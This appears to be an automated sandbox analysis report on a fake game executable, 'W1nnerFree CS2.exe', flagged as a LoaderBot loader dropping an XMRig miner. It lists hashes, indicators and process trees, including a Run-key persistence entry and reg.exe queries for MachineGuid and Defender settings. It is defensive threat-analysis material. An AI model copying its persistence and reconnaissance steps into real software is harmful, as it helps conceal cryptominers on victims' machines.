loaderbot | 69bef682277aa8ed7ffdb645a8e41d1f1d279380cc799256132d0cac50582890

Analysis

max time kernel
23s
max time network
156s
platform
windows10-2004_x64
resource
win10v2004-20231215-en
resource tags

arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
submitted
20-02-2024 01:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

W1nnerFree CS2.exe
Size

21.4MB
MD5

7494cccce30350832ac77113f3cf28d8
SHA1

ffba86775e5dc0a12957249e5f2d1c48bb1c58f0
SHA256

0fa48a6368effe6c9373dd34f9f26bf7f0a2050aab330cefc5acc6de5030ecb6
SHA512

94550c34c2887ca3227bfc559eeb2806bdd189b31bd866facbc5ed22ff2f6dc89684b268aa22a36c1b6a062deb2db6545d4e1b021a572f85fc9fcf7f65d059e7
SSDEEP

393216:KYd9oOoUptPemm5HCizqg+o1sg1t6u14FBmqXiW2wcpIZSFH+fbYdUvCAhZ:pdnh/Ge41L1th15qIT41fsdU6m

Score

10^/10

loaderbot xmrig loader miner persistence upx

Malware Config

Signatures

LoaderBot
LoaderBot is a loader written in .NET downloading and executing miners.
loader miner loaderbot
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

LoaderBot executable 3 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\1337\MinerMega.exe	loaderbot
C:\Users\Admin\AppData\Roaming\1337\MinerMega.exe	loaderbot
behavioral2/memory/3856-39-0x00000000008D0000-0x0000000000CCE000-memory.dmp	loaderbot

XMRig Miner payload 11 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/368-1205-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/368-1809-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/368-1836-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/368-1874-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/368-1906-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/368-1972-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/368-2439-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/368-2546-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/368-2575-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/368-2581-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral2/memory/368-3286-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

W1nnerFree CS2.exeExLoader_Installer.exeMinerMega.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\Control Panel\International\Geo\Nation	W1nnerFree CS2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\Control Panel\International\Geo\Nation	ExLoader_Installer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\Control Panel\International\Geo\Nation	MinerMega.exe

Drops startup file 1 IoCs

Processes:

MinerMega.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url MinerMega.exe
Executes dropped EXE 4 IoCs

Processes:

ExLoader_Installer.exeMinerMega.exeExLoader_Installer.exeDriver.exe

pid process

3080 ExLoader_Installer.exe
3856 MinerMega.exe
2392 ExLoader_Installer.exe
368 Driver.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url	MinerMega.exe

pid	process
3080	ExLoader_Installer.exe
3856	MinerMega.exe
2392	ExLoader_Installer.exe
368	Driver.exe

Loads dropped DLL 6 IoCs

Processes:

W1nnerFree CS2.exeExLoader_Installer.exe

pid	process
4272	W1nnerFree CS2.exe
2392	ExLoader_Installer.exe
2392	ExLoader_Installer.exe
2392	ExLoader_Installer.exe
2392	ExLoader_Installer.exe
2392	ExLoader_Installer.exe

UPX packed file 10 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\OperaSetup.exe	upx
C:\Users\Admin\AppData\Local\Temp\OperaSetup.exe	upx
behavioral2/memory/1516-1882-0x0000000000100000-0x0000000000634000-memory.dmp	upx
behavioral2/memory/4412-1895-0x0000000000100000-0x0000000000634000-memory.dmp	upx
behavioral2/memory/1968-1910-0x0000000000290000-0x00000000007C4000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\OperaSetup.exe	upx
behavioral2/memory/4980-1934-0x0000000000100000-0x0000000000634000-memory.dmp	upx
behavioral2/memory/1256-1917-0x0000000000100000-0x0000000000634000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\OperaSetup.exe	upx
behavioral2/memory/1256-1969-0x0000000000100000-0x0000000000634000-memory.dmp	upx

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

MinerMega.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\MinerMega.exe"	MinerMega.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 10 IoCs

Processes:

MinerMega.exe

pid	process
3856	MinerMega.exe
3856	MinerMega.exe
3856	MinerMega.exe
3856	MinerMega.exe
3856	MinerMega.exe
3856	MinerMega.exe
3856	MinerMega.exe
3856	MinerMega.exe
3856	MinerMega.exe
3856	MinerMega.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

672
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

MinerMega.exeDriver.exe

description pid process

Token: SeDebugPrivilege 3856 MinerMega.exe
Token: SeLockMemoryPrivilege 368 Driver.exe
Token: SeLockMemoryPrivilege 368 Driver.exe
Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

ExLoader_Installer.exe

pid process

2392 ExLoader_Installer.exe
2392 ExLoader_Installer.exe

pid	process
672

description	pid	process
Token: SeDebugPrivilege	3856	MinerMega.exe
Token: SeLockMemoryPrivilege	368	Driver.exe
Token: SeLockMemoryPrivilege	368	Driver.exe

pid	process
2392	ExLoader_Installer.exe
2392	ExLoader_Installer.exe

Suspicious use of WriteProcessMemory 17 IoCs

Processes:

W1nnerFree CS2.exeExLoader_Installer.exeExLoader_Installer.execmd.execmd.exeMinerMega.exe

description	pid	process	target process
PID 4272 wrote to memory of 3080	4272	W1nnerFree CS2.exe	ExLoader_Installer.exe
PID 4272 wrote to memory of 3080	4272	W1nnerFree CS2.exe	ExLoader_Installer.exe
PID 4272 wrote to memory of 3856	4272	W1nnerFree CS2.exe	MinerMega.exe
PID 4272 wrote to memory of 3856	4272	W1nnerFree CS2.exe	MinerMega.exe
PID 4272 wrote to memory of 3856	4272	W1nnerFree CS2.exe	MinerMega.exe
PID 3080 wrote to memory of 2392	3080	ExLoader_Installer.exe	ExLoader_Installer.exe
PID 3080 wrote to memory of 2392	3080	ExLoader_Installer.exe	ExLoader_Installer.exe
PID 2392 wrote to memory of 4712	2392	ExLoader_Installer.exe	cmd.exe
PID 2392 wrote to memory of 4712	2392	ExLoader_Installer.exe	cmd.exe
PID 4712 wrote to memory of 4100	4712	cmd.exe	reg.exe
PID 4712 wrote to memory of 4100	4712	cmd.exe	reg.exe
PID 2392 wrote to memory of 4784	2392	ExLoader_Installer.exe	cmd.exe
PID 2392 wrote to memory of 4784	2392	ExLoader_Installer.exe	cmd.exe
PID 4784 wrote to memory of 3512	4784	cmd.exe	reg.exe
PID 4784 wrote to memory of 3512	4784	cmd.exe	reg.exe
PID 3856 wrote to memory of 368	3856	MinerMega.exe	Driver.exe
PID 3856 wrote to memory of 368	3856	MinerMega.exe	Driver.exe

C:\Users\Admin\AppData\Local\Temp\W1nnerFree CS2.exe
"C:\Users\Admin\AppData\Local\Temp\W1nnerFree CS2.exe"
1⤵
- Checks computer location settings
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4272

C:\Users\Admin\AppData\Roaming\1337\ExLoader_Installer.exe
"C:\Users\Admin\AppData\Roaming\1337\ExLoader_Installer.exe"
2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3080

C:\Users\Admin\AppData\Local\Temp\RarSFX0\ExLoader_Installer.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\ExLoader_Installer.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2392

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /C C:\Windows\System32\reg.exe query HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography /v MachineGuid
4⤵
- Suspicious use of WriteProcessMemory
PID:4712

C:\Windows\System32\reg.exe
C:\Windows\System32\reg.exe query HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography /v MachineGuid
5⤵
PID:4100

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /C C:\Windows\System32\reg.exe query HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography /v MachineGuid
4⤵
- Suspicious use of WriteProcessMemory
PID:4784

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /C C:\Windows\System32\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware
4⤵
PID:1232

C:\Windows\System32\reg.exe
C:\Windows\System32\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware
5⤵
PID:1320

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /C C:\Windows\System32\reg.exe query "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop
4⤵
PID:4984

C:\Windows\System32\reg.exe
C:\Windows\System32\reg.exe query "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop
5⤵
PID:2468

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -command "$WshShell = New-Object -comObject WScript.Shell $Shortcut = $WshShell.CreateShortcut(\"c:\users\admin\desktop\ExLoader.lnk\") $Shortcut.TargetPath = \"C:\Program Files\ExLoader\ExLoader.exe\" $Shortcut.Save()"
4⤵
PID:4880

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /C C:\Windows\System32\reg.exe query HKEY_CURRENT_USER\Software\Yandex\YandexBrowser /v last_startup_time
4⤵
PID:4476

C:\Windows\System32\reg.exe
C:\Windows\System32\reg.exe query HKEY_CURRENT_USER\Software\Yandex\YandexBrowser /v last_startup_time
5⤵
PID:4980

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /C C:\Windows\System32\reg.exe query "HKEY_CURRENT_USER\Software\Opera Software" /v "Last Stable Install Path"
4⤵
PID:1172

C:\Windows\System32\reg.exe
C:\Windows\System32\reg.exe query "HKEY_CURRENT_USER\Software\Opera Software" /v "Last Stable Install Path"
5⤵
PID:4884

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /C C:\Windows\System32\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Opera Software" /v "Last Stable Install Path"
4⤵
PID:980

C:\Windows\System32\reg.exe
C:\Windows\System32\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Opera Software" /v "Last Stable Install Path"
5⤵
PID:2020

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /C C:\Windows\System32\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Opera Software" /v "Last Stable Install Path"
4⤵
PID:4604

C:\Windows\System32\reg.exe
C:\Windows\System32\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Opera Software" /v "Last Stable Install Path"
5⤵
PID:4720

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /C C:\Windows\System32\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v InstallDate
4⤵
PID:2924

C:\Windows\System32\reg.exe
C:\Windows\System32\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v InstallDate
5⤵
PID:4084

C:\Program Files\ExLoader\ExLoader.exe
"C:\Program Files\ExLoader\ExLoader.exe" -deletePreviousExLoader
4⤵
PID:336

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /C C:\Windows\System32\reg.exe query HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography /v MachineGuid
5⤵
PID:1596

C:\Windows\System32\reg.exe
C:\Windows\System32\reg.exe query HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography /v MachineGuid
6⤵
PID:5064

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /C C:\Windows\System32\reg.exe query HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography /v MachineGuid
5⤵
PID:4292

C:\Windows\System32\reg.exe
C:\Windows\System32\reg.exe query HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography /v MachineGuid
6⤵
PID:1544

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /C C:\Windows\System32\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware
5⤵
PID:1116

C:\Windows\System32\reg.exe
C:\Windows\System32\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware
6⤵
PID:3508

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/o/oauth2/v2/auth?client_id=271686438760-tmrstjenhl84ugpc1gmq1q3rarashrre.apps.googleusercontent.com&response_type=code&redirect_uri=http%3A%2F%2Flocalhost%3A49728&scope=email+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fuserinfo.email&code_challenge=8AxXl3sh-g0cN8Vbq359GPV7VGIecyr7Mt39_V5f88o&code_challenge_method=S256&state=a7PignJlcF7O7Xr1q9XA5sieKJFvUAsC
5⤵
PID:6056

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xf8,0x108,0x7fff9a7646f8,0x7fff9a764708,0x7fff9a764718
6⤵
PID:6072

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2144,17999581240218152910,14062212565723014136,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 /prefetch:3
6⤵
PID:4800

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,17999581240218152910,14062212565723014136,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2156 /prefetch:2
6⤵
PID:3268

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2144,17999581240218152910,14062212565723014136,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2704 /prefetch:8
6⤵
PID:1648

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,17999581240218152910,14062212565723014136,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:1
6⤵
PID:5408

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,17999581240218152910,14062212565723014136,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3268 /prefetch:1
6⤵
PID:5380

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2144,17999581240218152910,14062212565723014136,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3552 /prefetch:8
6⤵
PID:5364

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2144,17999581240218152910,14062212565723014136,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3552 /prefetch:8
6⤵
PID:5316

C:\Program Files\ExLoader\stopfarmbot.exe
"C:\Program Files\ExLoader\stopfarmbot.exe"
5⤵
PID:3272

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /C C:\Windows\System32\reg.exe query HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography /v MachineGuid
6⤵
PID:5780

C:\Windows\System32\reg.exe
C:\Windows\System32\reg.exe query HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography /v MachineGuid
7⤵
PID:5864

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /C C:\Windows\System32\reg.exe query HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography /v MachineGuid
6⤵
PID:1960

C:\Windows\System32\reg.exe
C:\Windows\System32\reg.exe query HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography /v MachineGuid
7⤵
PID:1448

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /C C:\Windows\System32\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware
6⤵
PID:2208

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /C C:\Windows\System32\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware
6⤵
PID:5996

C:\Windows\System32\reg.exe
C:\Windows\System32\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware
7⤵
PID:3560

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /C C:\Windows\System32\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware
6⤵
PID:324

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /C C:\Windows\System32\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware
6⤵
PID:2952

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /C C:\Windows\System32\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware
6⤵
PID:5740

C:\Windows\System32\reg.exe
C:\Windows\System32\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware
7⤵
PID:1628

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /C C:\Windows\System32\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware
6⤵
PID:4548

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /C C:\Windows\System32\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware
6⤵
PID:5928

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /C C:\Windows\System32\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware
6⤵
PID:5432

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /C C:\Windows\System32\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware
6⤵
PID:5612

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /C C:\Windows\System32\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware
6⤵
PID:5340

C:\Windows\System32\reg.exe
C:\Windows\System32\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware
7⤵
PID:5056

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /C C:\Windows\System32\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware
6⤵
PID:2904

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /C C:\Windows\System32\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware
6⤵
PID:1460

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /C C:\Windows\System32\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware
6⤵
PID:5780

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /C C:\Windows\System32\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware
6⤵
PID:2504

C:\Windows\System32\reg.exe
C:\Windows\System32\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware
7⤵
PID:3828

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /C C:\Windows\System32\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware
4⤵
PID:4196

C:\Windows\System32\reg.exe
C:\Windows\System32\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware
5⤵
PID:3860

C:\Users\Admin\AppData\Local\Temp\OperaSetup.exe
C:\Users\Admin\AppData\Local\Temp\OperaSetup.exe --silent --allusers=0
4⤵
PID:1516

C:\Users\Admin\AppData\Local\Temp\OperaSetup.exe
C:\Users\Admin\AppData\Local\Temp\OperaSetup.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=107.0.5045.21 --initial-client-data=0x2e0,0x2e4,0x2e8,0x2bc,0x2ec,0x715d1184,0x715d1190,0x715d119c
5⤵
PID:4412

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\OperaSetup.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\OperaSetup.exe" --version
5⤵
PID:1968

C:\Users\Admin\AppData\Local\Temp\OperaSetup.exe
"C:\Users\Admin\AppData\Local\Temp\OperaSetup.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=1516 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240220010712" --session-guid=4c8bc1c9-e9a4-4629-be66-f80563f9e10a --server-tracking-blob="MGE5ZjFlMjg1NGMxNTQ5Nzk4ZDk4NDVkN2NlZTQ1NzkwNWFlYzllODBhZWNmMTljNmY4NmI1MTQzZjM1YWE2YTp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGU/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1PRlQmdXRtX2NhbXBhaWduPU9MRF9fMTgyMjZhIiwic3lzdGVtIjp7InBsYXRmb3JtIjp7ImFyY2giOiJ4ODZfNjQiLCJvcHN5cyI6IldpbmRvd3MiLCJvcHN5cy12ZXJzaW9uIjoiMTAiLCJwYWNrYWdlIjoiRVhFIn19LCJ0aW1lc3RhbXAiOiIxNzA4MzkxMjMwLjQwMDYiLCJ1c2VyYWdlbnQiOiJEYXJ0LzMuMSAoZGFydDppbykiLCJ1dG0iOnsiY2FtcGFpZ24iOiJPTERfXzE4MjI2YSIsIm1lZGl1bSI6ImFwYiIsInNvdXJjZSI6Ik9GVCJ9LCJ1dWlkIjoiNTk5YjU3MDMtZmQ4NC00YWIzLWJkNWItMGM2OWZlZDBiYzA5In0= " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=6004000000000000
5⤵
PID:1256

C:\Users\Admin\AppData\Local\Temp\OperaSetup.exe
C:\Users\Admin\AppData\Local\Temp\OperaSetup.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=107.0.5045.21 --initial-client-data=0x2ec,0x2f0,0x2f4,0x2bc,0x2f8,0x70351184,0x70351190,0x7035119c
6⤵
PID:4980

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202402200107121\assistant\Assistant_107.0.5045.21_Setup.exe_sfx.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202402200107121\assistant\Assistant_107.0.5045.21_Setup.exe_sfx.exe"
5⤵
PID:5016

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202402200107121\assistant\assistant_installer.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202402200107121\assistant\assistant_installer.exe" --version
5⤵
PID:5132

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202402200107121\assistant\assistant_installer.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202402200107121\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=107.0.5045.21 --initial-client-data=0x268,0x26c,0x270,0x244,0x274,0x740ff4,0x741000,0x74100c
6⤵
PID:5200

C:\Users\Admin\AppData\Roaming\1337\MinerMega.exe
